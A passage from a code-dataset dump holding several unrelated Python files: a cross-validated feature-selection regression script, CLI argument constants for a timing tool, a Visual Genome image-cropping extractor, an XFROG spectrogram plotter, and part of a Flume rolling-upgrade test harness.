mean_absolute_error,mean_squared_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.preprocessing import StandardScaler\n\n\n\n\n\ndef MAE(Y1,Y2):\n return mean_absolute_error(Y1,Y2)\ndef MSE(Y1, Y2):\n return mean_squared_error(Y1, Y2)\ndef SPC(y_true, y_pred):\n corr , _ = spearmanr(y_true,y_pred)\n return corr\ndef PNC(y_true, y_pred):\n corr , _ = pearsonr(y_true,y_pred)\n return corr\n\n\n\n\ndef normalize_df(df,features,target_col,scaler):\n X = df.loc[:,features].values\n Y = df.loc[:,target_col].values\n X = scaler.transform(X)\n out_df = pandas.DataFrame(X,index = df.index, columns=features)\n out_df[target_col]= Y\n return out_df\n\n\n\ndef normalize_train_test(training_set_df , test_set_df, feature_cols, target_col):\n train_set_X = training_set_df.loc[ :, feature_cols].values\n scaler = StandardScaler()\n scaler.fit(train_set_X)\n test_set_norm_df = normalize_df(test_set_df,input_features,target_col,scaler)\n training_set_norm_df = normalize_df(training_set_df,input_features,target_col,scaler)\n return training_set_norm_df, test_set_norm_df\n\n\n\n\n\n\ndef avg_cross_validation_score(model,scorer,trainfolds_dfs,testfolds_dfs,feature_set,target_col_name):\n scores = [None]*len(testfolds_dfs)\n for i in range(len(testfolds_dfs)):\n train_X = trainfolds_dfs[i].loc[:,feature_set].values\n train_Y = trainfolds_dfs[i].loc[:,target_col_name].values\n test_X = testfolds_dfs[i].loc[:,feature_set].values\n test_Y = testfolds_dfs[i].loc[:,target_col_name].values\n model.fit(train_X,train_Y)\n test_pred = model.predict(test_X)\n scores[i] = scorer(test_pred,test_Y)\n # if float(\"nan\") in scores:\n # print(\"None seen in scores\")\n avg_score = numpy.mean(scores)\n if numpy.isnan(avg_score):\n print(\"None seen in scores\")\n # print(\"cross validation on \",feature_set)\n # print(\"scores: \",scores)\n return avg_score\n\n\n\ndef get_resutls_column(model,trainfolds_dfs,testfolds_dfs,train_set,test_set,feature_set,target_col_name):\n MSEs = [None]*len(testfolds_dfs)\n MAEs = [None]*len(testfolds_dfs)\n SPs = [None]*len(testfolds_dfs)\n PNs = [None]*len(testfolds_dfs)\n for i in range(len(testfolds_dfs)):\n train_X = trainfolds_dfs[i].loc[:,feature_set].values\n train_Y = trainfolds_dfs[i].loc[:,target_col_name].values\n test_X = testfolds_dfs[i].loc[:,feature_set].values\n test_Y = testfolds_dfs[i].loc[:,target_col_name].values\n model.fit(train_X,train_Y)\n test_pred = model.predict(test_X)\n MAEs[i] = MAE(test_pred,test_Y)\n MSEs[i] = MSE(test_pred, test_Y)\n SPs[i] = SPC(test_pred, test_Y)\n PNs[i] = PNC(test_pred, test_Y)\n\n train_cvavg_MAE = numpy.mean(MAEs)\n train_cvavg_MSE = numpy.mean(MSEs)\n train_cvavg_PN = numpy.mean(PNs)\n train_cvavg_SP = numpy.mean(SPs)\n\n\n test_Y = test_set.loc[:, target_col].values\n test_X = test_set.loc[:, feature_set].values\n train_X = train_set.loc[:, feature_set].values\n train_Y = train_set.loc[:, target_col].values\n\n model.fit(train_X, train_Y)\n test_pred = model.predict(test_X)\n\n testset_pn, _ = pearsonr(test_Y, test_pred)\n testset_sp, _ = spearmanr(test_Y, test_pred)\n testset_mae = mean_absolute_error(test_Y, test_pred)\n testset_mse = mean_squared_error(test_Y, test_pred)\n\n column = [testset_mae, testset_mse,testset_pn, testset_sp, train_cvavg_MAE, train_cvavg_MSE, train_cvavg_PN, train_cvavg_SP ,feature_set,len(feature_set)]\n column += list(test_pred)\n return column\n\n\ndef wrapper_optimize(model,eval_criterion,input_sorted_features,train_fold_dfs,test_fold_dfs,target_column_name):\n # input of the wrapper-based method is\n # a pairs evaluation method and its threshold of increase in that score\n # a threshold for the correlation of features which pass the filter or in other words features to consider\n # a threshold for the mutual correlation between features to be acceptable\n # output of the wrapper based method\n # the list of best features\n # it can also print the progress of the wrapper based\n eval_func, eval_th , maximize = eval_criterion\n current_best_score = float(\"inf\")\n current_features = []\n if maximize:\n current_best_score = - current_best_score\n for feature in input_sorted_features:\n feautres_including_new = current_features+[feature]\n #find the resutls of cross validation for that set of features\n new_score = avg_cross_validation_score(model,globals()[eval_func],train_fold_dfs,test_fold_dfs,feautres_including_new,target_column_name)\n if maximize:\n if new_score - current_best_score >= eval_th:\n current_best_score = new_score\n current_features = feautres_including_new\n else:\n if current_best_score - new_score >= eval_th:\n current_best_score = new_score\n current_features = feautres_including_new\n return current_features, current_best_score\n\n\n\n\ndef filter_and_sort_features (dataset,input_features,target_col,filter_correlation_threshold,mutual_correlation_threshold):\n #this function is supposed to get a dataset (examples in rows and feautres in columns)\n #it outputs a list of noncorrelated (corrfilter_correlation_threshold:\n filtered_features.append(f)\n scores.append(score)\n scores = numpy.array(scores)\n sorted_idx = numpy.argsort(scores)[::-1]\n sorted_features = numpy.array(filtered_features)[sorted_idx]\n # sorted_scores = scores[sorted_idx]\n\n accepted_features = []\n for f in sorted_features:\n redundant = False\n new_feat_vals = dataset.loc[:, f].values\n for ff in accepted_features:\n accepted_feat_vals = dataset.loc[:, ff].values\n corr, _ = spearmanr(new_feat_vals,accepted_feat_vals)\n if abs(corr) > mutual_correlation_threshold:\n redundant = True\n if not redundant:\n accepted_features.append(f)\n\n return accepted_features\n\n\n\n\n\n\n\n\n\n\n############## read configurations\nimport json\nwith open(\"configurations.json\") as jsonfile:\n conf = json.load(jsonfile)\ndataset_root_dir = conf[\"dataset_root_dir\"]\nsampling_methods = conf[\"sampling_methods\"]\nsampling_methods = [x+\"_lowdim\" for x in sampling_methods]\ntest_set_path = dataset_root_dir + conf[\"file_locations\"][\"test_set\"]\ntest_folds_relpath = conf[\"file_locations\"][\"test_folds\"]\ntest_folds_path = [dataset_root_dir + relpath for relpath in test_folds_relpath]\n\n\n# sampling_methods = [\"nosampling\"]\nwrapper_opt_step = {}\nmutual_th_ops = {}\nfilt_thresholds ={}\n\nwrapper_opt_step[\"resolution\"] = [(\"SPC\",0.01,True),\n (\"SPC\",0.0075,True),\n (\"SPC\",0.005,True),\n (\"SPC\",0.001,True),\n #(\"PNC\",0.01,True),\n (\"MAE\",0.1,False),\n (\"MAE\",0.05, False),\n (\"MAE\",0.01,False),\n (\"MAE\",0.005, False),\n #(\"MSE\",0.1,False),\n #(\"MWE\",0.05,False),\n #(\"M4E\",0.5,False)\n ]\n\nmutual_th_ops[\"resolution\"] = [0.5,0.7,1]\nfilt_thresholds[\"resolution\"] = [0,0.1,0.2,0.3]\n\n\n\n\n\nwrapper_opt_step[\"rfree\"] = [(\"SPC\",0.01,True),\n (\"SPC\",0.0075,True),\n (\"SPC\",0.005,True),\n (\"SPC\",0.001,True),\n #(\"PNC\",0.01,True),\n #(\"MAE\",0.1,False),\n (\"MAE\",0.05, False),\n (\"MAE\",0.01, False),\n (\"MAE\",0.005, False),\n\t(\"MAE\",0.001, False),\n #(\"MSE\",0.1,False),\n #(\"MWE\",0.05,False),\n #(\"M4E\",0.5,False)\n ]\nmutual_th_ops[\"rfree\"] = [0.5,0.7,1]\nfilt_thresholds[\"rfree\"] = [0,0.1,0.2]\n\n\n\n\n#####################################\n\n\ntest_set_df = pandas.read_csv(test_set_path)\nnum_CV_folds = len(test_folds_path)\n\n\n\nrow_labels = [\"test_MAE\",\n \"test_MSE\",\n \"test_pearson\",\n \"test_spearman\",\n \"avg_training_MAE\",\n \"avg_test_MSE\",\n \"avg_training_pearson\",\n \"avg_training_spearman\",\n \"feature_list\",\n \"num_features\"] + list(test_set_df[\"PDB ID\"].values)\n\n\n\nfor target_var in [\"resolution\",\"rfree\"]:\n target_col = conf[\"target_col\"][target_var]\n input_features = conf[\"input_features\"][\"selected\"][target_var]\n for sampling in sampling_methods:\n results_df = pandas.DataFrame()\n results_df[target_col] = [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"] + list(test_set_df[target_col].values)\n results_df.index = row_labels\n\n training_set_path = dataset_root_dir+conf[\"file_locations\"][\"training_set\"][sampling][target_var]\n train_folds_relpath = conf[\"file_locations\"][\"training_folds\"][sampling][target_var]\n train_folds_path = [dataset_root_dir + relpath for relpath in train_folds_relpath]\n test_fold_norm_df = [None] * num_CV_folds\n train_fold_norm_df = [None] * num_CV_folds\n train_set_norm_df, test_set_norm_df = normalize_train_test(pandas.read_csv(training_set_path),\n pandas.read_csv(test_set_path), input_features,\n target_col)\n for i in range(num_CV_folds):\n train_fold_norm_df[i],test_fold_norm_df[i] = normalize_train_test(pandas.read_csv(train_folds_path[i]), pandas.read_csv(test_folds_path[i]), input_features, target_col)\n\n for step, mu, fil in itertools.product(wrapper_opt_step[target_var], mutual_th_ops[target_var], filt_thresholds[target_var]):\n scoring_func = globals()[step[0]]\n step_threshold = step[1]\n sorted_features = filter_and_sort_features(train_set_norm_df, input_features, target_col, fil, mu)\n column_name = \"fil\" + str(fil) + \"_mu\" + str(mu) + \"_\" + scoring_func.__name__ + str(step_threshold)\n if len(sorted_features)>0:\n working_model = LinearRegression()\n sel_features, score = wrapper_optimize(working_model, step, sorted_features, train_fold_norm_df, test_fold_norm_df,\n target_col)\n results_df[column_name] = get_resutls_column(working_model, train_fold_norm_df, test_fold_norm_df, train_set_norm_df,\n test_set_norm_df, sel_features, target_col)\n else:\n results_df[column_name] = [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"0\"] + [\"\"]*(len(row_labels)-10)\n # best_feature\n\n results_df.to_csv(\"results_linreg_\"+target_col+\"_\"+sampling+\".csv\",columns=sorted(results_df.columns))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"modeling_experiments/sklearn/linreg_WBfsel_CVfoldsinfiles_lowdim.py","file_name":"linreg_WBfsel_CVfoldsinfiles_lowdim.py","file_ext":"py","file_size_in_byte":11564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469840106","text":"# coding: utf-8\nfrom __future__ import absolute_import\nfrom aoikargutil import SPEC_DI_K_EXC\nfrom aoikargutil import SPEC_DI_K_ONE\nfrom aoikargutil import SPEC_DI_K_TWO\n\n#/\nARG_HELP_ON_F = '-h'\nARG_HELP_ON_F2 = '--help'\n\n#/\nARG_EXPR_F = '-e'\nARG_EXPR_K = '3mu6ExF'\nARG_EXPR_V = 'EXPR'\nARG_EXPR_H = 'Expression to evaluate.'\n\n#/\nARG_STMT_F = '-E'\nARG_STMT_K = '2xrXbjs'\nARG_STMT_V = 'STMT'\nARG_STMT_H = 'Statement to execute.'\n\n#/\nARG_FUNC_URI_F = '-f'\nARG_FUNC_URI_K = '3v2mXqJ'\nARG_FUNC_URI_V = 'FUNC_URI'\nARG_FUNC_URI_H = 'Function to call.'\n\n#/\n## |ATP| means argument type parser\nARG_FUNC_ATP_F = '--atp'\nARG_FUNC_ATP_K = '2iDyLEh'\nARG_FUNC_ATP_V = 'FUNC_URI'\nARG_FUNC_ATP_H = \"\"\"Function's argument type parser.\"\"\"\n\n#/\nARG_INSPECT_ON_F = '-i'\nARG_INSPECT_ON_K = '3pDvfIp'\nARG_INSPECT_ON_D = False\nARG_INSPECT_ON_V = '1|0'\nARG_INSPECT_ON_H = \"\"\"Inspect on/off. Default is {}.\"\"\"\\\n .format('on' if ARG_INSPECT_ON_D else 'off')\n\n#/\nARG_TIMEIT_ON_F = '-t'\nARG_TIMEIT_ON_K = '3cNEdq0'\nARG_TIMEIT_ON_D = False\nARG_TIMEIT_ON_V = '1|0'\nARG_TIMEIT_ON_H = \"\"\"Timeit on/off. Default is {}.\"\"\"\\\n .format('on' if ARG_TIMEIT_ON_D else 'off')\n\n#/\nARG_TIMEIT_SCODE_F = '-s'\nARG_TIMEIT_SCODE_K = '3r0UfcM'\nARG_TIMEIT_SCODE_D = ''\nARG_TIMEIT_SCODE_V = 'SCODE'\nARG_TIMEIT_SCODE_H = 'Timeit setup code, which is run only once.'\n\n#/\nARG_NUMBER_CNT_F = '-n'\nARG_NUMBER_CNT_K = '2c6Nuwa'\nARG_NUMBER_CNT_D = 10000\nARG_NUMBER_CNT_V = 'N'\nARG_NUMBER_CNT_H = \"\"\"How many times to run for one timer. Default is {}.\"\"\"\\\n .format(ARG_NUMBER_CNT_D)\n\n#/\nARG_REPEAT_CNT_F = '-r'\nARG_REPEAT_CNT_K = '2aTsx48'\nARG_REPEAT_CNT_D = 1\nARG_REPEAT_CNT_V = 'N'\nARG_REPEAT_CNT_H = \"\"\"How many timers to repeat. Default is {}. Result time is the average of all timers'.\"\"\"\\\n .format(ARG_REPEAT_CNT_D)\n\n#/\nARG_TIME_PP_F = '--tpp'\nARG_TIME_PP_K = '3khrJ5Z'\nARG_TIME_PP_D = 9\nARG_TIME_PP_V = 'N'\nARG_TIME_PP_H = \"\"\"Result time's print precision. Default is {}.\"\"\"\\\n .format(ARG_TIME_PP_D)\n\n#/\nARG_RATE_PP_F = '--rpp'\nARG_RATE_PP_K = '2fZi4CO'\nARG_RATE_PP_D = 0\nARG_RATE_PP_V = 'N'\nARG_RATE_PP_H = \"\"\"Result rate's print precision. Default is {}.\"\"\"\\\n .format(ARG_RATE_PP_D)\n\n#/\nARG_DBG_MSG_F = '-V'\nARG_DBG_MSG_K = '3i7rDi1'\nARG_DBG_MSG_D = True\nARG_DBG_MSG_V = '1|0'\nARG_DBG_MSG_H = \"\"\"Debug messages on/off. Default is {}.\"\"\"\\\n .format('on' if ARG_DBG_MSG_D else 'off')\n\n#/\nARG_VER_ON_F = '--ver'\nARG_VER_ON_K = '3akDRjn'\nARG_VER_ON_A = 'store_true'\nARG_VER_ON_H = 'Show version.'\n\n#/\nARG_SPEC = {\n SPEC_DI_K_ONE: (\n ARG_HELP_ON_F,\n ARG_HELP_ON_F2,\n ARG_VER_ON_F,\n #/ 3dfPlme\n ARG_EXPR_F,\n ARG_STMT_F,\n ARG_FUNC_URI_F,\n ),\n SPEC_DI_K_TWO: [\n (ARG_FUNC_ATP_F, ARG_FUNC_URI_F),\n (ARG_TIMEIT_SCODE_F, ARG_TIMEIT_ON_F),\n (ARG_NUMBER_CNT_F, ARG_TIMEIT_ON_F),\n (ARG_REPEAT_CNT_F, ARG_TIMEIT_ON_F),\n (ARG_TIME_PP_F, ARG_TIMEIT_ON_F),\n (ARG_RATE_PP_F, ARG_TIMEIT_ON_F),\n ],\n SPEC_DI_K_EXC: [\n (ARG_INSPECT_ON_F, (ARG_EXPR_F, ARG_STMT_F, ARG_TIMEIT_ON_F)),\n ],\n}\n","sub_path":"src/aoikfuncit/argpsr_const.py","file_name":"argpsr_const.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496963985","text":"from collections import Counter, namedtuple\nfrom io import BytesIO\nfrom itertools import chain\nimport logging\nimport os\nimport json\nimport pickle\n\nfrom IPython.display import display\nimport numpy as np\nfrom PIL import Image\nimport requests\nimport torch\n\nPreprocessedData = namedtuple('PreprocessedData',\n ('object_squares',\n 'img_ids',\n 'original_sizes',\n 'object_names',\n 'attributes_names')\n )\n\nclass WrongModeException(Exception):\n pass\n\nclass BBExtractor(object):\n def __init__(self, data_path='/home/ubuntu/data',\n preprocessing_path='/home/ubuntu/preprocessing',\n max_num_objects=100,\n max_num_attributes=100,\n use_sparse_matrices=True):\n self.data_path = data_path\n self.preprocessing_path = preprocessing_path\n self.image_data_path = os.path.join(data_path, 'image_data.json')\n self.objects_path = os.path.join(data_path, 'objects.json')\n self.attributes_path = os.path.join(data_path, 'attributes.json')\n self.img_dir = os.path.join(data_path, 'VG_100K_all')\n self.max_num_objects = max_num_objects\n self.max_num_attributes = max_num_attributes\n self.objects_info = self._objects_info()\n self.attributes_info = self._attributes_info()\n self.vocabulary = self._vocabulary()\n self.use_sparse_matrices = use_sparse_matrices\n \n def _objects_info(self):\n logger = logging.getLogger(__name__)\n with open(self.objects_path, 'r') as objects_file:\n objects_info_list = json.loads(objects_file.read())\n objects_info = {obj['image_id']: obj\n for obj in objects_info_list}\n logger.info('Loaded objects info.')\n return objects_info\n \n def _attributes_info(self):\n logger = logging.getLogger(__name__)\n with open(self.attributes_path, 'r') as attributes_file:\n attributes_info_list = json.loads(attributes_file.read())\n attributes_info = {attr['image_id']: attr \n for attr in attributes_info_list}\n logger.info('Loaded attributes info.')\n return attributes_info\n \n def _vocabulary(self):\n logger = logging.getLogger(__name__)\n\n vocabulary_path = os.path.join(self.preprocessing_path, 'vocabulary.pkl')\n if os.path.exists(vocabulary_path):\n with open(vocabulary_path, 'rb') as vocabulary_file:\n vocabulary = pickle.load(vocabulary_file)\n logger.info('Loaded vocabulary.')\n else:\n objects_counter = Counter()\n for objects_info_image in self.objects_info.values():\n for object_ in objects_info_image['objects']:\n for name in object_['names']:\n objects_counter[name] += 1\n sorted_obj_items = sorted(objects_counter.items(), key=lambda u: (-u[1], u[0]))\n vocabulary_objects = [item[0] for item in sorted_obj_items]\n obj_to_ix = {name: ix for ix, name in enumerate(vocabulary_objects)}\n\n attributes_counter = Counter()\n vocabulary_attributes = set()\n for attributes_info_image in self.attributes_info.values():\n for attributes_info_object in attributes_info_image['attributes']:\n for attribute in attributes_info_object.get('attributes', []):\n attributes_counter[attribute] += 1\n sorted_attr_items = sorted(attributes_counter.items(), key=lambda u: (-u[1], u[0]))\n vocabulary_attributes = [item[0] for item in sorted_attr_items]\n att_to_ix = {name: ix for ix, name in enumerate(vocabulary_attributes)}\n \n vocabulary = {\n 'vocabulary_objects': vocabulary_objects,\n 'obj_to_ix': obj_to_ix,\n 'vocabulary_attributes': vocabulary_attributes,\n 'att_to_ix': att_to_ix\n }\n with open(vocabulary_path, 'wb') as vocabulary_file:\n pickle.dump(vocabulary, vocabulary_file)\n logger.info('Generated vocabulary.')\n return vocabulary\n \n def get_img(self, img_id, url):\n img_name = '{}.jpg'.format(img_id)\n image_path = os.path.join(self.img_dir, img_name)\n if os.path.isfile(image_path):\n return Image.open(image_path)\n if url is not None:\n url_split = url.split('/')\n r = requests.get(url)\n r.raise_for_status()\n image_path = os.path.join(dir_path, url_split[-2], img_name)\n with open(image_path, 'wb') as image_file:\n image_file.write(r.content)\n return Image.open(BytesIO(r.content))\n raise requests.exceptions.HTTPError\n \n def label_vector(self, an, m):\n size = torch.Size((len(an), m))\n if self.use_sparse_matrices:\n indices_list = [[i, v]\n for i, attr_row in enumerate(an)\n for v in attr_row\n if v < m]\n k = len(indices_list)\n if k > 0:\n indices = torch.LongTensor(list(zip(*indices_list)))\n values = torch.ones(k).byte()\n return torch.sparse.ByteTensor(indices,\n values,\n size)\n return torch.sparse.ByteTensor(size)\n else:\n R = torch.zeros(size).byte()\n for i, attr_row in enumerate(an):\n for v in attr_row:\n if v < m:\n R[i, v] = 1\n return R\n \n def preprocess_image(self, image_id, display_images=False): \n objects_info_image = self.objects_info[image_id]\n attributes_info_image = self.attributes_info[image_id]\n img = self.get_img(img_id=objects_info_image['image_id'],\n url=objects_info_image.get('image_url', None))\n\n if img.mode != 'RGB':\n raise WrongModeException\n\n if display_images:\n display(img)\n print('Original image\\n')\n\n objects = objects_info_image['objects']\n N = len(objects)\n\n attributes = attributes_info_image['attributes']\n attributes_dict = {object_['object_id']:\n object_.get('attributes', [])\n for object_ in attributes}\n\n img_ids = np.ones(N, dtype=np.int) * image_id\n objects_squares = np.empty((N, 3, 224, 224), dtype=np.uint8)\n original_sizes = np.empty(N, dtype=np.int)\n objects_names = []\n attributes_names = []\n \n att_to_ix = self.vocabulary['att_to_ix']\n obj_to_ix = self.vocabulary['obj_to_ix']\n\n for i, (object_, attrs) in enumerate(zip(objects, attributes)):\n attrs = attributes_dict[object_['object_id']]\n attributes_names.append([att_to_ix[attr] for attr in attrs])\n original_sizes[i] = object_['w'] * object_['h']\n objs = object_['names']\n objects_names.append([obj_to_ix[obj] for obj in objs])\n\n # Image processing\n cropped = img.crop((object_['x'],\n object_['y'],\n object_['x'] + object_['w'],\n object_['y'] + object_['h']))\n resized = cropped.resize((224, 224))\n\n if display_images:\n display(resized)\n print(' - '.join(object_['names']))\n print()\n\n objects_squares[i] = np.rollaxis(np.asarray(resized), axis=2, start=0)\n\n return PreprocessedData(objects_squares, img_ids, original_sizes, objects_names, attributes_names)\n \n def preprocess_images(self, image_ids):\n assert len(image_ids) >= 1\n logger = logging.getLogger(__name__)\n failed = []\n wrong_mode = []\n\n lists_per_image = []\n \n for _ in PreprocessedData._fields:\n lists_per_image.append([])\n\n for image_id in image_ids:\n try:\n result = self.preprocess_image(image_id)\n except requests.exceptions.HTTPError:\n failed.append(str(image_id))\n continue\n except WrongModeException:\n wrong_mode.append(str(image_id))\n continue\n except Exception as e:\n logger.error('Error with image {}.'.format(image_id))\n raise e\n\n for i, r in enumerate(result):\n lists_per_image[i].append(r)\n\n if failed:\n logger.warning('Failed to load image(s) {}.'.format(', '.join(failed)))\n\n if wrong_mode:\n logger.warning('Wrong mode for image(s) {}.'.format(', '.join(wrong_mode)))\n \n for i in range(0, 3):\n lists_per_image[i] = np.concatenate(lists_per_image[i])\n \n properties_objatt = ((3, self.max_num_attributes),\n (4, self.max_num_objects))\n for i, max_num in properties_objatt:\n an = sum(lists_per_image[i], [])\n lists_per_image[i] = self.label_vector(an, max_num)\n \n return PreprocessedData(*lists_per_image)\n \n @property\n def VG_ids_with_COCO(self):\n if not hasattr(self, '_VG_ids_with_COCO'):\n image_data_path = os.path.join(self.data_path, 'image_data.json')\n with open(image_data_path, 'r') as D: #json file containing visual genome image information.\n F = json.loads(D.read()) # creates a list\n VG_ids = [] # list of common visual genome ids\n\n for f in F:\n if f['coco_id'] is not None:\n VG_ids.append(f['image_id'])\n self._VG_ids_with_COCO = sorted(VG_ids)\n return self._VG_ids_with_COCO","sub_path":"Att_net/bounding_box_extractor.py","file_name":"bounding_box_extractor.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621016250","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport scipy as s\nimport scipy.fftpack as fft\nimport matplotlib.pyplot as plot\nimport wells.publisher as publisher\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--t\",\n type=float,\n help=\"Time at which diagram should be plotted\")\nparser.add_argument(\"--width\",\n type=float,\n default=1.0,\n help=\"Window width\")\nparser.add_argument(\"--ext\",\n help=\"output file extension\",\n type=str,\n default=\"png\")\nparser.add_argument(\"input\",\n type=str,\n help=\"Path to the input file\")\nargs = parser.parse_args()\n\n\nworkspace = s.load(args.input)\nt = workspace[\"t\"]\nx = workspace[\"x\"]\nk = workspace[\"k\"]\nstates = workspace[\"states\"]\nbackground = workspace[\"background\"]\n\n\nidx = abs(t - args.t).argmin()\nt = t[idx]\nstate = states[idx, :]\n\n\ndef xfrog(x0, state, delay, width):\n window = lambda x: s.exp(-(x/width)**2)\n diagram = s.zeros((len(x), len(delay)), dtype=complex)\n for idx in range(len(delay)):\n diagram[:, idx] = window(x - delay[idx]) * state\n diagram = fft.fft(diagram, axis=0)\n diagram = fft.fftshift(diagram, axes=[0])\n return diagram\n\n\ndelay = s.linspace(-64, +64, 2**11)\nimage = xfrog(t, state, delay, args.width)\nimage = abs(image)\nimage = image / image.max()\nimage = 20 * s.log10(image)\n\npublisher.init({\"figure.figsize\": (2.8, 2.4)})\nprefix = args.input.replace(\".npz\", \"\")\nfilename = prefix + \"_xfrog=%.2f\" % args.t\n\nplot.figure()\naxs = plot.subplot(1, 1, 1)\nplot.title(r\"$t=%.2f$\" % args.t, y=1.05)\nplot.pcolormesh(\n delay, k, image,\n cmap=\"magma\",\n rasterized=True)\nplot.xlim(-20, +20)\nplot.xticks(s.arange(-40, +41, 20))\nplot.ylim(-40, +40)\nplot.yticks(s.arange(-40, +41, 20))\nplot.clim(-80, 0)\nplot.colorbar().set_ticks(s.arange(-80, 1, 20))\nplot.xlabel(r\"$z$\")\nplot.ylabel(r\"$k_z$\")\naxs.tick_params(direction=\"out\")\n\npublisher.publish(filename, args.ext)\nplot.close()\n\nprint(filename + \".\" + args.ext)\n","sub_path":"publish_xfrog.py","file_name":"publish_xfrog.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"340350661","text":"#\n# Copyright (c) 2011-2016, Hortonworks Inc. All rights reserved.\n#\n# Except as expressly permitted in a written agreement between your\n# company and Hortonworks, Inc, any use, reproduction, modification,\n# redistribution, sharing, lending or other exploitation of all or\n# any part of the contents of this file is strictly prohibited.\n#\n#\nimport os, re, string, time, socket, logging, platform, urllib2, collections, datetime, json\nimport urllib, sys, shutil\nfrom beaver.component.hadoop import Hadoop, HDFS, MAPRED, YARN\nfrom beaver.component import HadoopJobHelper\nfrom beaver.machine import Machine\nfrom beaver.config import Config\nfrom beaver import util\nfrom beaver import configUtils\n\nlogger = logging.getLogger(__name__)\n\n\nclass ruFlume:\n _agent1 = None\n _agent2 = None\n _local_work_dir = os.path.join(Config.getEnv('ARTIFACTS_DIR'), 'flume')\n _data_file = os.path.join(_local_work_dir, 'data.out')\n _data_stop = os.path.join(_local_work_dir, \"data.stop\")\n _flume_test_conf = os.path.join(Config.getEnv('WORKSPACE'), 'tests', 'rolling_upgrade', 'flumeconf')\n _flume_datagen_src = os.path.join(_flume_test_conf, 'print_stream.py')\n _flume_test_src = os.path.join(_local_work_dir, 'longrunning.properties')\n _hdfs_test_dir = \"/tmp/flumelr\"\n _test_user = Config.getEnv('USER')\n _hdfs_user = Config.get('hadoop', 'HDFS_USER')\n _agent1_chkpt_dir = os.path.join(_local_work_dir, 'checkpoint1')\n _agent2_chkpt_dir = os.path.join(_local_work_dir, 'checkpoint2')\n _agent1_data_dir = os.path.join(_local_work_dir, 'datadir1')\n _agent2_data_dir = os.path.join(_local_work_dir, 'datadir2')\n\n @classmethod\n def background_job_setup(cls, runSmokeTestSetup=True, config=None):\n '''\n Setup for background long running job\n :param runSmokeTestSetup: Runs smoke test setup if set to true\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n UpgradePerNode.reportProgress(\"[INFO][FLUME][BGJobSetup] Long running job setup for Flume component started\")\n from beaver.component.flume import Agent\n global agent1\n global agent2\n if not os.path.exists(cls._local_work_dir):\n os.mkdir(cls._local_work_dir)\n shutil.copy(cls._flume_datagen_src, cls._local_work_dir)\n agent1 = Agent(cls._local_work_dir)\n agent2 = Agent(cls._local_work_dir)\n for outdir in (cls._agent1_chkpt_dir, cls._agent1_data_dir, cls._agent2_chkpt_dir, cls._agent2_data_dir):\n os.mkdir(outdir)\n logger.info(\"Preparing the Flume configs for long running test\")\n propertyMap = {}\n namenode = Hadoop.getFSDefaultValue()\n propertyMap['agent2.sinks.hdfsSink.hdfs.path'] = \"%s%s\" % (namenode, cls._hdfs_test_dir)\n if Hadoop.isSecure():\n if Config.hasOption('machine', 'USER_REALM'):\n user_realm = Config.get('machine', 'USER_REALM', '')\n else:\n nnKerbPrincipal = HDFS.getNameNodePrincipal(defaultValue='')\n atloc = nnKerbPrincipal.find(\"@\")\n if atloc != -1:\n user_realm = nnKerbPrincipal[atloc:]\n if user_realm:\n propertyMap['agent2.sinks.hdfsSink.hdfs.kerberosPrincipal'] = cls._test_user + '@' + user_realm\n propertyMap['agent2.sinks.hdfsSink.hdfs.kerberosKeytab'] = Machine.getHeadlessUserKeytab(cls._test_user)\n util.writePropertiesToFile(\n os.path.join(cls._flume_test_conf, 'longrunning.properties'), cls._flume_test_src, propertyMap\n )\n\n @classmethod\n def smoke_test_setup(cls):\n '''\n Setup required to run Smoke test\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def run_background_job(cls, runSmokeTestSetup=True, config=None):\n '''\n Runs background long running Flume Job\n :param runSmokeTestSetup: Runs smoke test setup if set to true\n :param config: expected configuration location\n :return: Total number of long running jobs started\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n HDFS.createDirectory(cls._hdfs_test_dir, perm=\"777\", force=True)\n UpgradePerNode.reportProgress(\"[INFO][FLUME][BGJob] Long running job for Flume component started\")\n logger.info(\"Starting the Flume Agent Topology\")\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent2.log\" % cls._local_work_dir\n agent2.start(\"agent2\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n logger.info(\"Sleeping for 10 seconds before starting the other Flume agent\")\n time.sleep(10)\n addlParams = \"-Dflume.log.dir=%s -Dflume.log.file=agent.log\" % cls._local_work_dir\n agent1.start(\"agent\", cls._flume_test_src, addlParams=addlParams, enableDebugLogOnConsole=False)\n time.sleep(5)\n return 1\n\n @classmethod\n def run_smoke_test(cls, smoketestnumber, config=None):\n '''\n Run smoke test for yarn\n :param smoketestnumber: Used for unique output log location\n '''\n logger.info(\"TODO\")\n\n @classmethod\n def background_job_teardown(cls):\n '''\n Cleanup for long running Yarn job\n '''\n from beaver.component.rollingupgrade.ruUpgrade import UpgradePerNode\n UpgradePerNode.reportProgress(\n \"[INFO][FLUME][BGJobTeardown] teardown for Long running job of Flume component started\"\n )\n if agent1.isalive():\n logger.info(\"Terminating the first Flume agent\")\n agent1.stop()\n if agent2.isalive():\n logger.info(\"Terminating the second Flume agent\")\n agent2.stop()\n for outdir in 